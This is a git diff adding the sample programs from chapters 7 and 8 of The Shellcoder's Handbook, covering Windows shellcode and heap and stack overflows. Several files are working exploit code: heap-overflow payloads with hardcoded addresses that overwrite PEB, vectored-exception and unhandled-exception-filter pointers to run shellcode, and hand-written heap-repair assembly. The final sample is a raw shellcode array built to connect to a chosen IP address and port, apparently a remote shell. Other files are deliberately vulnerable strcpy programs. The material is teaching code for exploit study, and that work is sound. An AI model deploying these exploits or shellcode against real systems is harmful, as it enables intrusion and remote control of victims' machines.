+     .long 0x00000000
+
+     
+     WS232FUNCTIONSTABLE:
+CONNECT:
+     .long 0x00000000
+RECV:
+     .long 0x00000000
+SEND:
+     .long 0x00000000
+WSASTARTUP:
+     .long 0x00000000
+SOCKET:
+     .long 0x00000000
+
+//end of ws2_32.dll functions table
+
+SIZE:
+     .long 0x00000000
+
+FDSPOT:
+     .long 0x00000000
+BUF:
+     .long 0x00000000
+     
+     ");
+
+}
+
+int main()
+{
+        unsigned char buffer[4000]; 
+        unsigned char * p;
+        int i;
+        char *mbuf,*mbuf2;
+        int error=0;
+        //getprocaddr();
+        memcpy(buffer,getprocaddr,2400);
+        p=buffer;
+        p+=3; /*skip prelude of function*/
+
+//#define DOPRINT
+
+#ifdef DOPRINT
+
+/*gdb ) printf "%d\n", endsploit - mainentrypoint -1 */
+
+        printf("\"");
+        for (i=0; i<666; i++)
+          {
+                printf("\\x%2.2x",*p);
+                if ((i+1)%8==0)
+                  printf("\"\nshellcode+=\"");
+                p++;
+          }
+
+        printf("\"\n");
+#endif
+
+#define DOCALL
+#ifdef DOCALL
+((void(*)())(p)) ();
+#endif
+
+
+}
+
+
+
diff --git a/Chapter_07/Shellcoders07sampleprogram02.c b/Chapter_07/Shellcoders07sampleprogram02.c
new file mode 100644
index 0000000..bef2776
--- /dev/null
+++ b/Chapter_07/Shellcoders07sampleprogram02.c
@@ -0,0 +1,41 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 7: Windows Shellcode
+Sample Program #2
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+                                                                                
+main(int argc, char **argv)
+{
+ char * p;
+ unsigned int hash;
+                                                                                
+ if (argc<2)
+  {
+   printf("Usage: hash.exe kernel32.dll\n");
+   exit(0);
+  }
+                                                                                
+ p=argv[1];
+                                                                                
+ hash=0;
+ while (*p!=0)
+  {
+    //toupper the character
+    hash=hash + (*(unsigned char * )p | 0x60);
+    p++;
+    hash=hash << 1;
+  }
+ printf("Hash: 0x%8.8x\n",hash);
+                                                                                                                                                               
+}
diff --git a/Chapter_08/Shellcoders08sampleprogram01.c b/Chapter_08/Shellcoders08sampleprogram01.c
new file mode 100644
index 0000000..0c99450
--- /dev/null
+++ b/Chapter_08/Shellcoders08sampleprogram01.c
@@ -0,0 +1,43 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 8: Windows Overflows
+Sample Program #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+#include <windows.h>
+
+dword MyExceptionHandler(void)
+{
+             printf("In exception handler....");
+             ExitProcess(1);
+             return 0;
+}
+
+int main()
+{
+              try
+              {
+                   __asm
+{
+     // Cause an exception
+                            xor eax,eax
+                            call eax
+}
+
+            }
+            __except(MyExceptionHandler())
+            {
+                    printf("oops...");
+             }
+             return 0;
+}
diff --git a/Chapter_08/Shellcoders08sampleprogram02.c b/Chapter_08/Shellcoders08sampleprogram02.c
new file mode 100644
index 0000000..a897907
--- /dev/null
+++ b/Chapter_08/Shellcoders08sampleprogram02.c
@@ -0,0 +1,38 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 8: Windows Overflows
+Sample Program #2
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+#include <windows.h>
+
+int main()
+{
+            FILETIME ft;
+            unsigned int Cookie=0;
+            unsigned int tmp=0;
+            unsigned int *ptr=0;
+            LARGE_INTEGER perfcount;
+
+            GetSystemTimeAsFileTime(&ft);
+            Cookie = ft.dwHighDateTime ^ ft.dwLowDateTime;
+            Cookie = Cookie ^ GetCurrentProcessId();
+            Cookie = Cookie ^ GetCurrentThreadId();
+            Cookie = Cookie ^ GetTickCount();
+            QueryPerformanceCounter(&perfcount);
+            ptr = (unsigned int)&perfcount;
+            tmp = *(ptr+1) ^ *ptr;
+            Cookie = Cookie ^ tmp;
+            printf("Cookie: %.8X\n",Cookie);
+            return 0;
+}
diff --git a/Chapter_08/Shellcoders08sampleprogram03.c b/Chapter_08/Shellcoders08sampleprogram03.c
new file mode 100644
index 0000000..aa238ac
--- /dev/null
+++ b/Chapter_08/Shellcoders08sampleprogram03.c
@@ -0,0 +1,59 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 8: Windows Overflows
+Sample Program #3
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+#include <windows.h>
+
+     HANDLE hp=NULL;
+     int ReturnHostFromUrl(char **, char *);
+
+     int main()
+     {
+            char *ptr = NULL;
+            hp = HeapCreate(0,0x1000,0x10000);
+            ReturnHost-FromUrl(&ptr,"http://www.ngssoftware.com/index.html");
+            printf("Host is %s",ptr);
+            HeapFree(hp,0,ptr);
+            return 0;
+
+     }
+
+     int ReturnHostFromUrl(char **buf, char *url)
+     {
+            int count = 0;
+            char *p = NULL;
+            char buffer[40]="";
+
+            // Get a pointer to the start of the host
+            p = strstr(url,"http://");
+            if(!p)
+                    return 0;
+            p = p + 7;
+            // do processing on a local copy
+            strcpy(buffer,p); // <------ NOTE 1
+            // find the first slash
+            while(buffer[count] !='/')
+                    count ++;
+            // set it to NULL
+            buffer[count] = 0;
+            // We now have in buffer the host name
+            // Make a copy of this on the heap
+            p = (char *)HeapAlloc(hp,0,strlen(buffer)+1);
+            if(!p)
+                    return 0;
+            strcpy(p,buffer);
+            *buf = p; // <-------------- NOTE 2
+            return 0;
+     }
diff --git a/Chapter_08/Shellcoders08sampleprogram04.c b/Chapter_08/Shellcoders08sampleprogram04.c
new file mode 100644
index 0000000..d3ade47
--- /dev/null
+++ b/Chapter_08/Shellcoders08sampleprogram04.c
@@ -0,0 +1,67 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 8: Windows Overflows
+Sample Program #4
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+#include <windows.h>
+
+     DWORD MyExceptionHandler(void);
+     int foo(char *buf);
+
+     int main(int argc, char *argv[])
+     {
+            HMODULE l;
+            l = LoadLibrary("msvcrt.dll");
+            l = LoadLibrary("netapi32.dll");
+            printf("\n\nHeapoverflow program.\n");
+            if(argc != 2)
+                    return printf("ARGS!");
+            foo(argv[1]);                                             
+            return 0;
+     }
+
+     DWORD MyExceptionHandler(void)
+     {
+            printf("In exception handler....");
+            ExitProcess(1);
+            return 0;
+     }
+
+     int foo(char *buf)
+     {
+            HLOCAL h1 = 0, h2 = 0;
+            HANDLE hp;
+
+            __try{
+                    hp = HeapCreate(0,0x1000,0x10000);
+                    if(!hp)
+                           return printf("Failed to create heap.\n");
+
+                    h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);
+
+                    printf("HEAP: %.8X %.8X\n",h1,&h1);
+
+                    // Heap Overflow occurs here:
+                    strcpy(h1,buf);
+                    
+                    // This second call to HeapAlloc() is when we gain control
+                    h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);
+                    printf("hello");
+            }
+            __except(MyExceptionHandler())
+            {
+                    printf("oops...");
+            }
+            return 0;
+     }
diff --git a/Chapter_08/Shellcoders08sampleprogram05.c b/Chapter_08/Shellcoders08sampleprogram05.c
new file mode 100644
index 0000000..2020a96
--- /dev/null
+++ b/Chapter_08/Shellcoders08sampleprogram05.c
@@ -0,0 +1,103 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 8: Windows Overflows
+Sample Program #5
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+#include <windows.h>
+
+     unsigned int GetAddress(char *lib, char *func);
+     void fixupaddresses(char *tmp, unsigned int x);
+
+     int main()
+     {
+            unsigned char buffer[300]="";
+            unsigned char heap[8]="";
+            unsigned char pebf[8]="";
+            unsigned char shellcode[200]="";
+            unsigned int address_of_system = 0;
+            unsigned int address_of_RtlEnterCriticalSection = 0;
+            unsigned char tmp[8]="";
+            unsigned int cnt = 0;
+
+            printf("Getting addresses...\n");
+            address_of_system = GetAddress("msvcrt.dll","system");
+            address_of_RtlEnterCriticalSection = GetAd-dress("ntdll.dll","RtlEnterCriticalSection");
+            if(address_of_system == 0 || 	ad-dress_of_RtlEnterCriticalSection == 0)
+                    return printf("Failed to get addresses\n");
+            printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system);
+            printf("Address of ntdll.RtlEnterCriticalSection\t= %.8X\n",address_of_RtlEnterCriticalSection);
+            strcpy(buffer,"heap1 ");
+
+            // Shellcode - repairs the PEB then calls system("calc");
+     strcat(buffer,"\"\x90\x90\x90\x90\x01\x90\x90\x6A\x30\x59\x64\x8B\x01\xB9");
+            fixupaddresses(tmp,address_of_RtlEnterCriticalSection);
+            strcat(buffer,tmp);
+          strcat(buffer,"\x89\x48\x20\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9");
+            fixupaddresses(tmp,address_of_system);
+            strcat(buffer,tmp);
+                    strcat(buffer,"\xFF\xD1");
+
+            // Padding
+            while(cnt < 58)
+            {
+                    strcat(buffer,"DDDD");
+                    cnt ++;
+            }
+
+            // Pointer to RtlEnterCriticalSection pointer - 4 in PEB
+            strcat(buffer,"\x1C\xF0\xFD\x7f");
+
+            // Pointer to heap and thus shellcode
+            strcat(buffer,"\x88\x06\x35");
+
+            strcat(buffer,"\"");
+            printf("\nExecuting heap1.exe... calc should open.\n");
+            system(buffer);
+            return 0;
+     }
+
+     unsigned int GetAddress(char *lib, char *func)
+     {
+            HMODULE l=NULL;
+            unsigned int x=0;
+            l = LoadLibrary(lib);
+            if(!l)
+                    return 0;
+            x = GetProcAddress(l,func);
+            if(!x)
+                    return 0;
+            return x;
+     }     
+
+     void fixupaddresses(char *tmp, unsigned int x)
+     {
+            unsigned int a = 0;
+            a = x;
+            a = a << 24;
+            a = a >> 24;
+            tmp[0]=a;
+            a = x;
+            a = a >> 8;
+            a = a << 24;
+            a = a >> 24 ;
+            tmp[1]=a;
+            a = x;
+            a = a >> 16;
+            a = a << 24;
+            a = a >> 24;
+            tmp[2]=a;
+            a = x;
+            a = a >> 24;
+            tmp[3]=a;
+     }
diff --git a/Chapter_08/Shellcoders08sampleprogram06.c b/Chapter_08/Shellcoders08sampleprogram06.c
new file mode 100644
index 0000000..6172e56
--- /dev/null
+++ b/Chapter_08/Shellcoders08sampleprogram06.c
@@ -0,0 +1,112 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 8: Windows Overflows
+Sample Program #6
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+#include <windows.h>
+
+     unsigned int GetAddress(char *lib, char *func);
+     void fixupaddresses(char *tmp, unsigned int x);
+
+     int main()
+     {
+            unsigned char buffer[300]="";
+            unsigned char heap[8]="";
+            unsigned char pebf[8]="";
+            unsigned char shellcode[200]="";
+            unsigned int address_of_system = 0;
+            unsigned char tmp[8]="";
+            unsigned int cnt = 0;
+
+            printf("Getting address of system...\n");
+
+            address_of_system = GetAddress("msvcrt.dll","system");
+            if(address_of_system == 0)
+                    return printf("Failed to get address.\n");
+
+            printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system);
+
+            strcpy(buffer,"heap1 ");
+     
+            while(cnt < 5)
+            {
+                    strcat(buffer,"\x90\x90\x90\x90");
+                    cnt ++;
+            }
+
+            // Shellcode to call system("calc");
+      strcat(buffer,"\x90\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9");
+            fixupaddresses(tmp,address_of_system);
+            strcat(buffer,tmp);
+            strcat(buffer,"\xFF\xD1");;
+
+            cnt = 0;
+            while(cnt < 58)
+            {
+                    strcat(buffer,"DDDD");
+                    cnt ++;
+            }
+
+            // Pointer to 0x77FC3210 - 4. 0x77FC3210 holds
+            // the pointer to the first _VECTORED_EXCEPTION_NODE
+            // structure. 
+            strcat(buffer,"\x0C\x32\xFC\x77");
+
+            // Pointer to our psueudo _VECTORED_EXCEPTION_NODE
+            // structure at address 0x0012FF48. This address + 8
+            // contains a pointer to our allocated buffer. This
+            // is what will be called when the vectored exception
+            // handling kicks in. Modify this according to where
+            // it can be found on your system
+            strcat(buffer,"\x48\xff\x12\x00");
+
+            printf("\nExecuting heap1.exe... calc should open.\n");
+            system(buffer);
+            return 0;
+     }
+
+     unsigned int GetAddress(char *lib, char *func)
+     {
+            HMODULE l=NULL;
+            unsigned int x=0;
+            l = LoadLibrary(lib);
+            if(!l)
+                    return 0;
+            x = GetProcAddress(l,func);
+            if(!x)
+                    return 0;
+            return x;
+     }
+
+     void fixupaddresses(char *tmp, unsigned int x)
+     {
+            unsigned int a = 0;
+            a = x;
+            a = a << 24;
+            a = a >> 24;
+            tmp[0]=a;
+            a = x;
+            a = a >> 8;
+            a = a << 24;
+            a = a >> 24 ;
+            tmp[1]=a;
+            a = x;
+            a = a >> 16;
+            a = a << 24;
+            a = a >> 24;
+            tmp[2]=a;
+            a = x;
+            a = a >> 24;
+            tmp[3]=a;
+     }
diff --git a/Chapter_08/Shellcoders08sampleprogram07.c b/Chapter_08/Shellcoders08sampleprogram07.c
new file mode 100644
index 0000000..080ce6f
--- /dev/null
+++ b/Chapter_08/Shellcoders08sampleprogram07.c
@@ -0,0 +1,51 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 8: Windows Overflows
+Sample Program #7
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+     #include <windows.h>
+
+     int foo(char *buf);
+
+     int main(int argc, char *argv[])
+     {
+            HMODULE l;
+            l = LoadLibrary("msvcrt.dll");
+            l = LoadLibrary("netapi32.dll");
+            printf("\n\nHeapoverflow program.\n");
+            if(argc != 2)
+                    return printf("ARGS!");
+            foo(argv[1]);                                             
+            return 0;
+     }
+
+     int foo(char *buf)
+     {
+            HLOCAL h1 = 0, h2 = 0;
+            HANDLE hp;
+
+            hp = HeapCreate(0,0x1000,0x10000);
+            if(!hp)
+                    return printf("Failed to create heap.\n");
+            h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);
+            printf("HEAP: %.8X %.8X\n",h1,&h1);
+            
+            // Heap Overflow occurs here:
+            strcpy(h1,buf);
+            
+            // We gain control of this second call to HeapAlloc
+            h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,260);
+            printf("hello");
+            return 0;
+     }
diff --git a/Chapter_08/Shellcoders08sampleprogram08.c b/Chapter_08/Shellcoders08sampleprogram08.c
new file mode 100644
index 0000000..97c1082
--- /dev/null
+++ b/Chapter_08/Shellcoders08sampleprogram08.c
@@ -0,0 +1,110 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 8: Windows Overflows
+Sample Program #8
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+#include <windows.h>
+
+unsigned int GetAddress(char *lib, char *func);
+void fixupaddresses(char *tmp, unsigned int x);
+
+int main()
+{
+     unsigned char buffer[1000]="";
+     unsigned char heap[8]="";
+     unsigned char pebf[8]="";
+     unsigned char shellcode[200]="";
+     unsigned int address_of_system = 0;
+     unsigned char tmp[8]="";
+     unsigned int a = 0;
+     int cnt = 0;
+
+     printf("Getting address of system...\n");
+     address_of_system = GetAddress("msvcrt.dll","system");
+     if(address_of_system == 0)
+             return printf("Failed to get address.\n");
+     printf("Address of msvcrt.system\t\t\t= %.8X\n",address_of_system);
+     strcpy(buffer,"heap1 ");
+     while(cnt < 66)
+     {
+             strcat(buffer,"DDDD");
+             cnt++;
+     }
+
+     // This is where EDI+0x74 points to so we
+     // need to do a short jmp forwards
+     strcat(buffer,"\xEB\x14");
+
+     // some padding
+     strcat(buffer,"\x44\x44\x44\x44\x44\x44");
+     
+     // This address (0x77C3BBAD : netapi32.dll XP SP1) contains 
+     // a "call dword ptr[edi+0x74]" instruction. We overwrite 
+     // the Unhandled Exception Filter with this address.
+
+     strcat(buffer,"\xad\xbb\xc3\x77"); 
+
+     // Pointer to the Unhandled Exception Filter
+     strcat(buffer,"\xB4\x73\xED\x77"); // 77ED73B4
+
+     cnt = 0;
+
+     while(cnt < 21)
+     {
+             strcat(buffer,"\x90");
+             cnt ++;
+     }
+     // Shellcode stuff to call system("calc");
+     strcat(buffer,"\x33\xC0\x50\x68\x63\x61\x6C\x63\x54\x5B\x50\x53\xB9");
+     fixupaddresses(tmp,address_of_system);
+     strcat(buffer,tmp);
+     strcat(buffer,"\xFF\xD1\x90\x90");
+     printf("\nExecuting heap1.exe... calc should open.\n");
+     system(buffer);
+     return 0;
+}
+
+unsigned int GetAddress(char *lib, char *func)
+{
+     HMODULE l=NULL;
+     unsigned int x=0;
+     l = LoadLibrary(lib);
+     if(!l)
+             return 0;
+     x = GetProcAddress(l,func);
+     if(!x)
+             return 0;
+     return x;
+}
+
+void fixupaddresses(char *tmp, unsigned int x)
+{    unsigned int a = 0;
+     a = x;
+     a = a << 24;
+     a = a >> 24;
+     tmp[0]=a;
+     a = x;
+     a = a >> 8;
+     a = a << 24;
+     a = a >> 24 ;
+     tmp[1]=a;
+     a = x;
+     a = a >> 16;
+     a = a << 24;
+     a = a >> 24;
+     tmp[2]=a;
+     a = x;
+     a = a >> 24;
+     tmp[3]=a;
+}
diff --git a/Chapter_08/Shellcoders08sampleprogram09.c b/Chapter_08/Shellcoders08sampleprogram09.c
new file mode 100644
index 0000000..0b96a2f
--- /dev/null
+++ b/Chapter_08/Shellcoders08sampleprogram09.c
@@ -0,0 +1,31 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 8: Windows Overflows
+Sample Program #9
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+
+     int main()
+     {
+             __asm{
+                    mov eax, dword ptr fs:[0x18]
+                    push eax
+                    }
+            printf("TEB: %.8X\n");
+     
+            __asm{
+                    add esp,4
+                    }
+
+            return 0;
+     }
diff --git a/Chapter_08/Shellcoders08sampleprogram10.c b/Chapter_08/Shellcoders08sampleprogram10.c
new file mode 100644
index 0000000..32fa352
--- /dev/null
+++ b/Chapter_08/Shellcoders08sampleprogram10.c
@@ -0,0 +1,78 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 8: Windows Overflows
+Sample Program #10
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+// We've just landed in our buffer after a
+     // call to dword ptr[edi+74]. This, therefore
+     // is a pointer to the heap control structure
+     // so move this into edx as we'll need to 
+     // set some values here
+     mov edx, dword ptr[edi+74]
+     // If running on Windows 2000 use this
+     // instead
+     // mov edx, dword ptr[esi+0x4C]
+     // Push 0x18 onto the stack
+     push 0x18
+     // and pop into into EBX
+     pop ebx
+     // Get a pointer to the Thread Information
+     // Block at fs:[18]
+     mov eax, dword ptr fs:[ebx]
+     // Get a pointer to the Process Environment
+     // Block from the TEB.
+     mov eax, dword ptr[eax+0x30]
+     // Get a pointer to the default process heap
+     // from the PEB
+     mov eax, dword ptr[eax+0x18]
+     // We now have in eax a pointer to the heap
+     // This address will be of the form 0x00nn0000
+     // Adjust the pointer to the heap to point to the
+     // TotalFreeSize dword of the heap structure
+     add al,0x28
+     // move the WORD in TotalFreeSize into si
+     mov si, word ptr[eax]
+     // and then write this to our heap control
+     // structure. We need this.
+     mov word ptr[edx],si
+     // Adjust edx by 2
+     inc edx
+     inc edx
+     // Set the previous size to 8
+     mov byte ptr[edx],0x08
+     inc edx
+     // Set the next 2 bytes to 0
+     mov si, word ptr[edx]
+     xor word ptr[edx],si
+     inc edx
+     inc edx
+     // Set the flags to 0x14
+     mov byte ptr[edx],0x14
+     inc edx
+     // and the next 2 bytes to 0
+     mov si, word ptr[edx]
+     xor word ptr[edx],si
+     inc edx
+     inc edx
+     // now adjust eax to point to heap_base+0x178
+     // It's already heap_base+0x28
+     add ax,0x150
+     // eax now points to FreeLists[0]
+     // now write edx into FreeLists[0].Flink
+     mov dword ptr[eax],edx
+     // and write edx into FreeLists[0].Blink
+     mov dword ptr[eax+4],edx
+     // Finally set the pointers at the end of our
+     // block to point to FreeLists[0]
+     mov dword ptr[edx],eax
+     mov dword ptr[edx+4],eax
diff --git a/Chapter_08/Shellcoders08sampleprogram11.c b/Chapter_08/Shellcoders08sampleprogram11.c
new file mode 100644
index 0000000..89e59e0
--- /dev/null
+++ b/Chapter_08/Shellcoders08sampleprogram11.c
@@ -0,0 +1,42 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 8: Windows Overflows
+Sample Program #11
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+#include <windows.h>
+
+unsigned char buffer[32]="";
+FARPROC mprintf = 0;
+FARPROC mstrcpy = 0;
+
+int main(int argc, char *argv[])
+{    
+     HMODULE l = 0;
+     l = LoadLibrary("msvcrt.dll");
+     if(!l)
+            return 0;
+     mprintf = GetProcAddress(l,"printf");
+     if(!mprintf)
+            return 0;
+     mstrcpy = GetProcAddress(l,"strcpy");
+     if(!mstrcpy)
+            return 0;
+     (mstrcpy)(buffer,argv[1]);
+     __asm{ add esp,8 }
+     (mprintf)("%s",buffer);
+     __asm{ add esp,8 }
+     FreeLibrary(l);
+
+     return 0;
+}
diff --git a/Chapter_08/Shellcoders08sampleprogram12.c b/Chapter_08/Shellcoders08sampleprogram12.c
new file mode 100644
index 0000000..8362c4c
--- /dev/null
+++ b/Chapter_08/Shellcoders08sampleprogram12.c
@@ -0,0 +1,35 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 8: Windows Overflows
+Sample Program #12
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+
+    int foo(char *);
+
+    int main(int argc, char *argv[])
+    {
+            unsigned char buffer[520]="";
+            if(argc !=2)
+                    return printf("Please supply an argument!\n");
+            foo(argv[1]);
+            return 0;
+     }
+
+     int foo(char *input)
+     {
+            unsigned char buffer[600]="";
+            printf("%.8X\n",&buffer);
+            strcpy(buffer,input);
+            return 0;
+     }
diff --git a/Chapter_08/Shellcoders08sampleprogram13.c b/Chapter_08/Shellcoders08sampleprogram13.c
new file mode 100644
index 0000000..66b1564
--- /dev/null
+++ b/Chapter_08/Shellcoders08sampleprogram13.c
@@ -0,0 +1,152 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 8: Windows Overflows
+Sample Program #13
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+    #include <windows.h>
+
+     unsigned char exploit[510]=
+     "\x55\x8B\xEC\xEB\x03\x5B\xEB\x05\xE8\xF8\xFF\xFF\xFF\xBE\xFF\xFF"
+     "\xFF\xFF\x81\xF6\xDC\xFE\xFF\xFF\x03\xDE\x33\xC0\x50\x50\x50\x50"
+     "\x50\x50\x50\x50\x50\x50\xFF\xD3\x50\x68\x61\x72\x79\x41\x68\x4C"
+     "\x69\x62\x72\x68\x4C\x6F\x61\x64\x54\xFF\x75\xFC\xFF\x55\xF4\x89"
+     "\x45\xF0\x83\xC3\x63\x83\xC3\x5D\x33\xC9\xB1\x4E\xB2\xFF\x30\x13"
+     "\x83\xEB\x01\xE2\xF9\x43\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xEC"
+     "\x83\xC3\x10\x53\xFF\x75\xFC\xFF\x55\xF4\x89\x45\xE8\x83\xC3\x0C"
+     "\x53\xFF\x55\xF0\x89\x45\xF8\x83\xC3\x0C\x53\x50\xFF\x55\xF4\x89"
+     "\x45\xE4\x83\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xE0\x83"
+     "\xC3\x0C\x53\xFF\x75\xF8\xFF\x55\xF4\x89\x45\xDC\x83\xC3\x08\x89"
+     "\x5D\xD8\x33\xD2\x66\x83\xC2\x02\x54\x52\xFF\x55\xE4\x33\xC0\x33"
+     "\xC9\x66\xB9\x04\x01\x50\xE2\xFD\x89\x45\xD4\x89\x45\xD0\xBF\x0A"
+     "\x01\x01\x26\x89\x7D\xCC\x40\x40\x89\x45\xC8\x66\xB8\xFF\xFF\x66"
+     "\x35\xFF\xCA\x66\x89\x45\xCA\x6A\x01\x6A\x02\xFF\x55\xE0\x89\x45"
+     "\xE0\x6A\x10\x8D\x75\xC8\x56\x8B\x5D\xE0\x53\xFF\x55\xDC\x83\xC0"
+     "\x44\x89\x85\x58\xFF\xFF\xFF\x83\xC0\x5E\x83\xC0\x5E\x89\x45\x84"
+     "\x89\x5D\x90\x89\x5D\x94\x89\x5D\x98\x8D\xBD\x48\xFF\xFF\xFF\x57"
+     "\x8D\xBD\x58\xFF\xFF\xFF\x57\x33\xC0\x50\x50\x50\x83\xC0\x01\x50"
+     "\x83\xE8\x01\x50\x50\x8B\x5D\xD8\x53\x50\xFF\x55\xEC\xFF\x55\xE8"
+     "\x60\x33\xD2\x83\xC2\x30\x64\x8B\x02\x8B\x40\x0C\x8B\x70\x1C\xAD"
+     "\x8B\x50\x08\x52\x8B\xC2\x8B\xF2\x8B\xDA\x8B\xCA\x03\x52\x3C\x03"
+     "\x42\x78\x03\x58\x1C\x51\x6A\x1F\x59\x41\x03\x34\x08\x59\x03\x48"
+     "\x24\x5A\x52\x8B\xFA\x03\x3E\x81\x3F\x47\x65\x74\x50\x74\x08\x83"
+     "\xC6\x04\x83\xC1\x02\xEB\xEC\x83\xC7\x04\x81\x3F\x72\x6F\x63\x41"
+     "\x74\x08\x83\xC6\x04\x83\xC1\x02\xEB\xD9\x8B\xFA\x0F\xB7\x01\x03"
+     "\x3C\x83\x89\x7C\x24\x44\x8B\x3C\x24\x89\x7C\x24\x4C\x5F\x61\xC3"
+     "\x90\x90\x90\xBC\x8D\x9A\x9E\x8B\x9A\xAF\x8D\x90\x9C\x9A\x8C\x8C"
+     "\xBE\xFF\xFF\xBA\x87\x96\x8B\xAB\x97\x8D\x9A\x9E\x9B\xFF\xFF\xA8"
+     "\x8C\xCD\xA0\xCC\xCD\xD1\x9B\x93\x93\xFF\xFF\xA8\xAC\xBE\xAC\x8B"
+     "\x9E\x8D\x8B\x8A\x8F\xFF\xFF\xA8\xAC\xBE\xAC\x90\x9C\x94\x9A\x8B"
+     "\xBE\xFF\xFF\x9C\x90\x91\x91\x9A\x9C\x8B\xFF\x9C\x92\x9B\xFF\xFF"
+     "\xFF\xFF\xFF\xFF";
+
+
+     int main(int argc, char *argv[])
+     {
+            int cnt = 0;
+            unsigned char buffer[1000]="";
+
+            if(argc !=3)
+                    return 0;
+
+            StartWinsock();
+
+            // Set the IP address and port in the exploit code
+            // If your IP address has a NULL in it then the
+            // string will be truncated.
